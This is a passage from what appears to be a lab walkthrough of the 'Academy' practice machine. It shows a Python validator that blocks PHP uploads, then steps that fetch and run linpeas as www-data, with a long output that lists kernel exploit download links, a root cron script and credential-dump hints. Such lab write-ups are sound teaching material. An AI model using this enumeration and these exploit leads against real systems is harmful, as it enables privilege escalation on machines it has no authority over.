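    store uploads outside the web root entirely.
    """
    base = os.path.basename(client_name.replace("\\", "/"))
    if "." not in base:
        raise UploadRejected("missing extension")
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in MAGIC:
        raise UploadRejected(f".{ext} is not an allowed image extension")
    if not content.startswith(MAGIC[ext]):
        raise UploadRejected("content does not match declared image type")
    if any(tag in content for tag in PHP_TAGS):
        raise UploadRejected("PHP open tag found inside image data")
    return f"{secrets.token_hex(16)}.{ext}"


def check(client_name, content):
    """Convenience wrapper returning (accepted, stored_name_or_reason)."""
    try:
        return True, validate_photo(client_name, content)
    except UploadRejected as e:
        return False, str(e)


# Constructed sample uploads; the PHP bodies are harmless placeholders,
# not the reverse shell from the walkthrough.
SAMPLES = {
    "real photo": ("boys-profile-picture-screenshot.jpg", MAGIC["jpg"] + b"\x00" * 64),
    "plain php":  ("php-reverse-shell.php", b"<?php echo 'placeholder'; ?>"),
    "double ext": ("shell.php.jpg", b"<?php echo 'placeholder'; ?>"),
    "polyglot":   ("photo.jpg", MAGIC["jpg"] + b"\xff" * 16 + b"<?php echo 1; ?>"),
    "path trick": ("../../studentphoto/x.png", MAGIC["png"] + b"\x00" * 8),
}


def run_samples():
    """Run every sample through check(); returns {label: (accepted, info)}."""
    return {label: check(*upload) for label, upload in SAMPLES.items()}


if __name__ == "__main__":
    for label, (ok, info) in run_samples().items():
        print(f"{label:11} -> {'stored as ' + info if ok else 'REJECTED: ' + info}")
```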
- mkdir tmp and cd tmp
- download linpeas with wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh and chmod +x linpeas.sh
- run ./linpeas.sh
./linpeas.sh
linpeas-ng by github.com/PEASS-ng
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
╚═══════════════════╝
OS: Linux version 4.19.0-16-amd64 ([email protected]) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.181-1 (2021-03-19)
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: academy
Writable folder: /dev/shm
[+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /usr/bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.19.0-16-amd64 ([email protected]) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.181-1 (2021-03-19)
Distributor ID: Debian
Description: Debian GNU/Linux 10 (buster)
Release: 10
Codename: buster
╔══════════╣ Sudo version
sudo Not Found
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Date & uptime
Tue Jul 23 04:59:02 EDT 2024
04:59:02 up 2:26, 1 user, load average: 0.08, 0.02, 0.01
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
sda5
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
UUID=24d0cea7-c37b-4fd6-838e-d05cfb61a601 / ext4 errors=remount-ro 0 1
UUID=930c51cc-089d-42bd-8e30-f08b86c52dca none swap sw 0 0
/dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0
╔══════════╣ Environment
╚ Any private information inside environment variables?
HISTFILESIZE=0
OLDPWD=/var/www/html/academy/studentphoto
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
JOURNAL_STREAM=9:13145
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
INVOCATION_ID=29ad640951494fc9a5c2116dd7fa6308
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
HISTSIZE=0
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/html/academy/studentphoto/tmp
HISTFILE=/dev/null
╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2019-13272] PTRACE_TRACEME
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
Exposure: highly probable
Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*} ],fedora=30{kernel:5.0.9-*}
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47133.zip
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
Comments: Requires an active PolKit agent.
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ AppArmor profile? .............. unconfined
═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Seccomp enabled? ............... disabled
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)
╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
╚═══════════╝
╔══════════╣ Container related tools present (if any):
╔══════════╣ Am I Containered?
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No
╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
╚═══════╝
═╣ GCP Virtual Machine? ................. No
═╣ GCP Cloud Funtion? ................... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ Aliyun ECS? .......................... No
grep: /etc/cloud/cloud.cfg: No such file or directory
═╣ Tencent CVM? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM? ............................ No
═╣ Azure APP? ........................... No
./linpeas.sh: 2471: ./linpeas.sh: curl: not found
╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root 1 0.0 0.9 103804 9964 ? Ss 02:32 0:02 /sbin/init
root 334 0.0 0.8 40380 8624 ? Ss 02:32 0:00 /lib/systemd/systemd-journald
root 349 0.0 0.4 22064 5000 ? Ss 02:32 0:00 /lib/systemd/systemd-udevd
systemd+ 420 0.0 0.6 93084 6552 ? Ssl 02:32 0:00 /lib/systemd/systemd-timesyncd
└─(Caps) 0x0000000002000000=cap_sys_time
root 425 0.0 0.3 225824 3860 ? Ssl 02:32 0:00 /usr/sbin/rsyslogd -n -iNONE
root 427 0.0 0.2 8504 2736 ? Ss 02:32 0:00 /usr/sbin/cron -f
message+ 431 0.0 0.4 8980 4420 ? Ss 02:32 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
└─(Caps) 0x0000000020000000=cap_audit_write
root 434 0.0 0.7 19496 7400 ? Ss 02:32 0:00 /lib/systemd/systemd-logind
root 443 0.0 0.2 6620 2944 ? Ss 02:32 0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
root 449 0.0 0.7 15852 7204 ? Ss 02:32 0:00 /usr/sbin/sshd -D
root 450 0.0 0.3 6924 3500 tty1 Ss 02:32 0:00 /bin/login -p --
root 799 0.0 0.4 7652 4540 tty1 S+ 02:37 0:00 _ -bash
root 544 0.0 2.5 214892 25524 ? Ss 02:32 0:01 /usr/sbin/apache2 -k start
www-data 825 0.1 2.4 219232 24812 ? S 02:37 0:16 _ /usr/sbin/apache2 -k start
www-data 1406 0.0 1.9 215856 19332 ? S 03:37 0:01 _ /usr/sbin/apache2 -k start
www-data 1411 0.0 1.9 215856 20172 ? S 03:37 0:00 _ /usr/sbin/apache2 -k start
www-data 1414 0.0 1.9 215856 19988 ? S 03:37 0:00 _ /usr/sbin/apache2 -k start
www-data 1417 0.0 1.8 215864 18960 ? S 03:37 0:00 _ /usr/sbin/apache2 -k start
www-data 1422 0.0 1.9 215864 19352 ? S 03:37 0:00 _ /usr/sbin/apache2 -k start
www-data 2242 0.0 0.0 2388 752 ? S 04:57 0:00 | _ sh -c /bin/sh
www-data 2243 0.0 0.0 2388 752 ? S 04:57 0:00 | _ /bin/sh
www-data 2255 1.5 0.2 3320 2624 ? S 04:58 0:00 | _ /bin/sh ./linpeas.sh
www-data 4987 0.0 0.1 3320 1028 ? S 04:59 0:00 | _ /bin/sh ./linpeas.sh
www-data 4991 0.0 0.3 7960 3116 ? R 04:59 0:00 | | _ ps fauxwww
www-data 4990 0.0 0.1 3320 1028 ? S 04:59 0:00 | _ /bin/sh ./linpeas.sh
www-data 1431 0.0 1.8 215864 19148 ? S 03:37 0:00 _ /usr/sbin/apache2 -k start
www-data 1432 0.0 2.0 215872 20224 ? S 03:37 0:00 _ /usr/sbin/apache2 -k start
www-data 1434 0.0 1.9 215844 19636 ? S 03:37 0:00 _ /usr/sbin/apache2 -k start
www-data 1437 0.0 1.9 215880 19936 ? S 03:37 0:00 _ /usr/sbin/apache2 -k start
mysql 573 0.0 8.8 1274452 89792 ? Ssl 02:32 0:07 /usr/sbin/mysqld
root 794 0.0 0.8 21024 8516 ? Ss 02:37 0:00 /lib/systemd/systemd --user
root 795 0.0 0.2 104768 2280 ? S 02:37 0:00 _ (sd-pam)
root 809 0.0 0.5 9488 5604 ? Ss 02:37 0:00 dhclient
╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
╔══════════╣ Processes whose PPID belongs to a different user (not root)
╚ You will know if a user can somehow spawn processes as a different user
Proc 420 with ppid 1 is run by user systemd-timesync but the ppid user is root
Proc 431 with ppid 1 is run by user messagebus but the ppid user is root
Proc 573 with ppid 1 is run by user mysql but the ppid user is root
Proc 825 with ppid 544 is run by user www-data but the ppid user is root
Proc 1406 with ppid 544 is run by user www-data but the ppid user is root
Proc 1411 with ppid 544 is run by user www-data but the ppid user is root
Proc 1414 with ppid 544 is run by user www-data but the ppid user is root
Proc 1417 with ppid 544 is run by user www-data but the ppid user is root
Proc 1422 with ppid 544 is run by user www-data but the ppid user is root
Proc 1431 with ppid 544 is run by user www-data but the ppid user is root
Proc 1432 with ppid 544 is run by user www-data but the ppid user is root
Proc 1434 with ppid 544 is run by user www-data but the ppid user is root
Proc 1437 with ppid 544 is run by user www-data but the ppid user is root
╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND PID TID TASKCMD USER FD TYPE DEVICE SIZE/OFF NODE NAME
╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd process found (dump creds from memory as root)
apache2 process found (dump creds from memory as root)
sshd Not Found
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root 1077 Jun 16 2021 /etc/crontab
/etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 May 29 2021 .
drwxr-xr-x 74 root root 4096 Jul 23 04:50 ..
-rw-r--r-- 1 root root 102 Oct 11 2019 .placeholder
-rw-r--r-- 1 root root 712 Dec 17 2018 php
/etc/cron.daily:
total 40
drwxr-xr-x 2 root root 4096 May 29 2021 .
drwxr-xr-x 74 root root 4096 Jul 23 04:50 ..
-rw-r--r-- 1 root root 102 Oct 11 2019 .placeholder
-rwxr-xr-x 1 root root 539 Aug 8 2020 apache2
-rwxr-xr-x 1 root root 1478 May 12 2020 apt-compat
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 1187 Apr 18 2019 dpkg
-rwxr-xr-x 1 root root 377 Aug 28 2018 logrotate
-rwxr-xr-x 1 root root 1123 Feb 10 2019 man-db
-rwxr-xr-x 1 root root 249 Sep 27 2017 passwd
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 May 29 2021 .
drwxr-xr-x 74 root root 4096 Jul 23 04:50 ..
-rw-r--r-- 1 root root 102 Oct 11 2019 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 May 29 2021 .
drwxr-xr-x 74 root root 4096 Jul 23 04:50 ..
-rw-r--r-- 1 root root 102 Oct 11 2019 .placeholder
/etc/cron.weekly:
total 16
drwxr-xr-x 2 root root 4096 May 29 2021 .
drwxr-xr-x 74 root root 4096 Jul 23 04:50 ..
-rw-r--r-- 1 root root 102 Oct 11 2019 .placeholder
-rwxr-xr-x 1 root root 813 Feb 10 2019 man-db
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * /home/grimmie/backup.sh
╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/mariadb.service could be executing some relative path
/etc/systemd/system/mysql.service could be executing some relative path
/etc/systemd/system/mysqld.service could be executing some relative path
You can't write on systemd PATH
╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2024-07-23 05:09:00 EDT 9min left Tue 2024-07-23 04:39:01 EDT 20min ago phpsessionclean.timer phpsessionclean.service
Tue 2024-07-23 06:37:40 EDT 1h 38min left Mon 2024-07-22 12:25:22 EDT 16h ago apt-daily-upgrade.timer apt-daily-upgrade.service
Tue 2024-07-23 17:17:14 EDT 12h left Tue 2024-07-23 01:28:39 EDT 3h 30min ago apt-daily.timer apt-daily.service
Wed 2024-07-24 00:00:00 EDT 19h left Tue 2024-07-23 01:28:39 EDT 3h 30min ago logrotate.timer logrotate.service
Wed 2024-07-24 00:00:00 EDT 19h left Tue 2024-07-23 01:28:39 EDT 3h 30min ago man-db.timer man-db.service
Wed 2024-07-24 02:48:04 EDT 21h left Tue 2024-07-23 01:43:53 EDT 3h 15min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/usr/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/usr/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
sed: -e expression #1, char 0: no previous regular expression
/run/dbus/system_bus_socket
└─(Read Write)
/run/mysqld/mysqld.sock
└─(Read Write)
/run/systemd/fsck.progress
/run/systemd/journal/dev-log
└─(Read Write)
/run/systemd/journal/socket
└─(Read Write)
/run/systemd/journal/stdout
└─(Read Write)
/run/systemd/journal/syslog
└─(Read Write)
/run/systemd/notify
└─(Read Write)
/run/systemd/private
└─(Read Write)
/run/udev/control
/run/user/0/systemd/private
/var/run/dbus/system_bus_socket
└─(Read Write)
╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
:1.0 420 systemd-timesyn systemd-timesync :1.0 systemd-timesyncd.service - -
:1.231 7769 busctl www-data :1.231 apache2.service - -
:1.28 794 systemd root :1.28 [email protected] - -
:1.3 1 systemd root :1.3 init.scope - -
:1.4 434 systemd-logind root :1.4 systemd-logind.service - -
org.freedesktop.DBus 1 systemd root - init.scope - -
org.freedesktop.hostname1 - - - (activatable) - -
org.freedesktop.locale1 - - - (activatable) - -
org.freedesktop.login1 434 systemd-logind root :1.4 systemd-logind.service - -
org.freedesktop.network1 - - - (activatable) - -
org.freedesktop.resolve1 - - - (activatable) - -
org.freedesktop.systemd1 1 systemd root :1.3 init.scope - -
org.freedesktop.timedate1 - - - (activatable) - -
org.freedesktop.timesync1 420 systemd-timesyn systemd-timesync :1.0 systemd-timesyncd.service - -
╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
academy
127.0.0.1 localhost
127.0.1.1 academy.tcm.sec academy
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
domain localdomain
search localdomain
nameserver 192.168.92.2
tcm.sec
╔══════════╣ Interfaces
default 0.0.0.0
loopback 127.0.0.0
link-local 169.254.0.0
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:9e:e0:5d brd ff:ff:ff:ff:ff:ff
inet 192.168.92.131/24 brd 192.168.92.255 scope global dynamic ens33
valid_lft 1270sec preferred_lft 1270sec
inet6 fe80::20c:29ff:fe9e:e05d/64 scope link
valid_lft forever preferred_lft forever
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 *:80 *:*
tcp LISTEN 0 32 *:21 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
╔══════════╣ Can I sniff with tcpdump?
No
╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=33(www-data) gid=33(www-data) groups=33(www-data)
╔══════════╣ Do I have PGP keys?
gpg Not Found
netpgpkeys Not Found
netpgp Not Found
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is disabled (0), so sudo tokens could be abused
╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console
grimmie:x:1000:1000:administrator,,,:/home/grimmie:/bin/bash
root:x:0:0:root:/root:/bin/bash
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(grimmie) gid=1000(administrator) groups=1000(administrator),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
uid=101(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=102(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=103(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=104(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=105(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(mysql) gid=113(mysql) groups=113(mysql)
uid=107(ftp) gid=114(ftp) groups=114(ftp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
╔══════════╣ Login now
04:59:09 up 2:26, 1 user, load average: 0.37, 0.08, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 01:32 3:26m 0.03s 0.01s -bash
╔══════════╣ Last logons
root tty1 Sat May 29 13:31:08 2021 - down (00:12) 0.0.0.0
reboot system boot Sat May 29 13:30:20 2021 - Sat May 29 13:43:39 2021 (00:13) 0.0.0.0
root pts/0 Sat May 29 13:16:54 2021 - Sat May 29 13:27:56 2021 (00:11) 192.168.10.31
root tty1 Sat May 29 13:16:34 2021 - down (00:11) 0.0.0.0
reboot system boot Sat May 29 13:15:21 2021 - Sat May 29 13:27:58 2021 (00:12) 0.0.0.0
root pts/0 Sat May 29 13:08:39 2021 - Sat May 29 13:14:47 2021 (00:06) 192.168.10.31
administrator tty1 Sat May 29 13:06:40 2021 - down (00:08) 0.0.0.0
reboot system boot Sat May 29 13:05:58 2021 - Sat May 29 13:14:49 2021 (00:08) 0.0.0.0
wtmp begins Sat May 29 13:05:58 2021
╔══════════╣ Last time logon each user
Username Port From Latest
root tty1 Tue Jul 23 01:32:50 -0400 2024
grimmie pts/1 192.168.10.31 Sun May 30 03:21:39 -0400 2021
╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/nc
/usr/bin/nc.traditional
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/python3.7
/usr/bin/socat
/usr/bin/wget
╔══════════╣ Installed Compilers
╔══════════╣ MySQL version
mysql Ver 15.1 Distrib 10.3.27-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
═╣ MySQL connection using default root/root ........... No
═╣ MySQL connection using root/toor ................... No
═╣ MySQL connection using root/NOPASS ................. No
╔══════════╣ Searching mysql credentials and exec
From '/etc/mysql/mariadb.conf.d/50-server.cnf' Mysql user: user = mysql
Found readable /etc/mysql/my.cnf
[client-server]
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/
╔══════════╣ Analyzing MariaDB Files (limit 70)
-rw-r--r-- 1 root root 869 Oct 12 2020 /etc/mysql/mariadb.cnf
[client-server]
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/
-rw------- 1 root root 277 May 29 2021 /etc/mysql/debian.cnf
╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.38 (Debian)
Server built: 2020-08-25T20:08:29
httpd Not Found
Nginx version: nginx Not Found
/etc/apache2/conf-available/phpmyadmin.conf- <IfModule mod_mime.c>
/etc/apache2/conf-available/phpmyadmin.conf: AddType application/x-httpd-php .php
--
/etc/apache2/conf-available/phpmyadmin.conf- <FilesMatch ".+\.php$">
/etc/apache2/conf-available/phpmyadmin.conf: SetHandler application/x-httpd-php
--
/etc/apache2/conf-available/phpmyadmin.conf- <IfModule mod_mime.c>
/etc/apache2/conf-available/phpmyadmin.conf: AddType application/x-httpd-php .php
--
/etc/apache2/conf-available/phpmyadmin.conf- <FilesMatch ".+\.php$">
/etc/apache2/conf-available/phpmyadmin.conf: SetHandler application/x-httpd-php
--
/etc/apache2/conf-enabled/phpmyadmin.conf- <IfModule mod_mime.c>
/etc/apache2/conf-enabled/phpmyadmin.conf: AddType application/x-httpd-php .php
--
/etc/apache2/conf-enabled/phpmyadmin.conf- <FilesMatch ".+\.php$">
/etc/apache2/conf-enabled/phpmyadmin.conf: SetHandler application/x-httpd-php
--
/etc/apache2/conf-enabled/phpmyadmin.conf- <IfModule mod_mime.c>
/etc/apache2/conf-enabled/phpmyadmin.conf: AddType application/x-httpd-php .php
--
/etc/apache2/conf-enabled/phpmyadmin.conf- <FilesMatch ".+\.php$">
/etc/apache2/conf-enabled/phpmyadmin.conf: SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php7.3.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
/etc/apache2/mods-available/php7.3.conf: SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php7.3.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-available/php7.3.conf: SetHandler application/x-httpd-php-source
--
/etc/apache2/mods-enabled/php7.3.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
/etc/apache2/mods-enabled/php7.3.conf: SetHandler application/x-httpd-php
--
/etc/apache2/mods-enabled/php7.3.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-enabled/php7.3.conf: SetHandler application/x-httpd-php-source
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 May 29 2021 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 May 29 2021 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 May 29 2021 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 1332 Aug 8 2020 /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 35 May 29 2021 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
